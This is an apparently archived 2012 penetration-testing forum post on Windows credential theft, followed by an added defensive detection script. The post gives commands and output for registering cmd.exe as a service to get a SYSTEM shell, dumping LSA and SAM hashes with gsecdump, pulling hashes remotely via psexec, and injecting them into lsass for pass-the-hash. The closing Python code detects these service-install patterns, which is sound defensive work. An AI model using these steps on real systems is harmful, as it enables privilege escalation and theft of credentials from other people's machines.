中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: HASH injection attack
Author: admin
Time: 2012-11-6 21:09
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to inject the HASH information just captured with gsecdump into the local lsass process, achieving a hash injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need the password cracked at all; this is just using the tool. As the original article puts it well, whether the password is 4 characters or 127, as long as you have the hash it is 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx
I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
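From the defender's side, the technique in the post leaves a recognisable trace in the Windows System log: Event 7045 (a service was installed) whose image path is cmd.exe, followed within the SCM timeout by Event 7000 (the service failed to start with the 1053 "did not respond in a timely fashion" error, since cmd.exe never registers as a service), and PsExec's default service name PSEXESVC for the remote variant. The following Python script is an added example, not code from the post or the original blog; it correlates those events over constructed sample records whose field names are simplified from the real event XML.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records modelled on Windows System log events
# (7045 = "A service was installed", 7000 = "service failed to start").
# Field names are simplified from the real event XML for this example.
SAMPLE_EVENTS = [
    {"time": "2012-11-06T21:01:05", "id": 7045, "host": "WKS01", "service": "shellcmdline",
     "image": r"C:\WINDOWS\system32\cmd.exe /K start", "account": "LocalSystem"},
    {"time": "2012-11-06T21:01:36", "id": 7000, "host": "WKS01", "service": "shellcmdline",
     "error": "The service did not respond to the start or control request in a timely fashion."},
    {"time": "2012-11-06T21:05:40", "id": 7045, "host": "WKS02", "service": "PSEXESVC",
     "image": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
    {"time": "2012-11-06T21:10:00", "id": 7045, "host": "WKS03", "service": "VendorSvc",
     "image": r"C:\Program Files\Vendor\svc.exe", "account": "LocalSystem"},
]

# Interactive shells are not services; registering one is the trick shown in the post.
SHELL_IMAGE = re.compile(r"\\(cmd|powershell)\.exe\b", re.IGNORECASE)
# Default service name PsExec installs on the target (-s runs it as SYSTEM).
REMOTE_EXEC_SERVICE = re.compile(r"^PSEXESVC$", re.IGNORECASE)
TIMEOUT_TEXT = "did not respond to the start or control request"

def _ts(ev):
    return datetime.fromisoformat(ev["time"])

def detect(events, window=timedelta(seconds=90)):
    """Return {(host, service): [reasons]} for suspicious service installs."""
    installs, findings = {}, {}
    for ev in sorted(events, key=_ts):
        key = (ev["host"], ev["service"])
        if ev["id"] == 7045:
            installs[key] = ev
            reasons = []
            if SHELL_IMAGE.search(ev["image"]):
                reasons.append("shell binary registered as a service")
            if REMOTE_EXEC_SERVICE.match(ev["service"]):
                reasons.append("PsExec-style remote execution service")
            if reasons and ev.get("account") == "LocalSystem":
                reasons.append("runs as LocalSystem")
            if reasons:
                findings[key] = reasons
        # A non-service image never calls StartServiceCtrlDispatcher, so the
        # install is followed by error 1053 once the SCM start timeout expires.
        elif ev["id"] == 7000 and key in installs and TIMEOUT_TEXT in ev.get("error", ""):
            if _ts(ev) - _ts(installs[key]) <= window:
                findings.setdefault(key, []).append("start failed with 1053 timeout right after install")
    return findings
```

Feeding real 7045/7000 records exported from the System log into detect() is the only change needed to run this against a host; the install-then-timeout pair is the higher-confidence signal, since legitimate services rarely fail to start immediately after installation.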
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)